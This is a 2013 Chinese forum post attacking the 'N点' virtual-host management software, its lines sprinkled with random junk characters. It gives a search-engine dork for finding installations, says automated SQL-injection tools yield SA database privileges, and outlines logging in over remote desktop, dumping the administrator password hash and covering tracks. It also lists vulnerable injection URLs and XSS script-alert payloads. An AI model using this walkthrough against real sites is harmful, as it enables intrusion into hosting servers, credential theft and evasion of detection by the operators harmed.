不得不说N点实在是一个破东西
% z9 v: I/ @8 }7 b: x# D# H% \$ x就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂, P$ [! C/ I* p2 Z6 i
好吧 抱怨一下就行了 接下来关键的时候到了. X. \ q# m& j3 t' d1 g5 q
首先百度搜索关键字:inurl: (mmdatabase.asp)6 O" K" [; `9 o8 g, u6 j) X
我随便列举一个: www.xxxx.com- B! ?4 u+ Z8 D& o
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1" B9 j& p+ S! I. |$ a- d
扔入NBSI 或者啊D等各种傻逼工具后
% n) ]/ J5 `" w7 e你们会看到是SA权限
: {0 {5 ?# G1 L K3 [: @果断3389 上去 hash得到administrator密码
& R2 a0 V6 [1 R* a擦屁股走人~9 {/ f: u. d! d8 n
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的6 n: A7 `/ I5 Z
9 W9 J/ J. _0 m. d: D& \再附上其他几个漏洞页面' _" d. V' B3 F) P- F6 ~
SQL:
( r+ g2 V5 o# g/ O k2 x yhttp://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1* Y6 G! _ R+ a( P! Y
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11. H+ j# Q3 R$ M0 @# ?7 `
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9+ M; q. v7 K( J
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
# m1 k/ g: V: j) W* t7 Z8 ]5 OXSS证明:
9 N" _ |7 {! \7 uhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
" b2 `, t0 H) J7 P% T+ T; _http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”2 }2 b4 w; s: D' C0 F/ {, e
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>! R; G8 d' u' B6 O! v- {- M) A" W% c
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
/ E5 r! E& J& o还是星外吧 你们懂的
% z( T) N& A* S ?/ M/ `作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
- `9 s- N* W) b* T! fPS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉) H8 f5 O2 c+ ~! h+ G/ w
——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对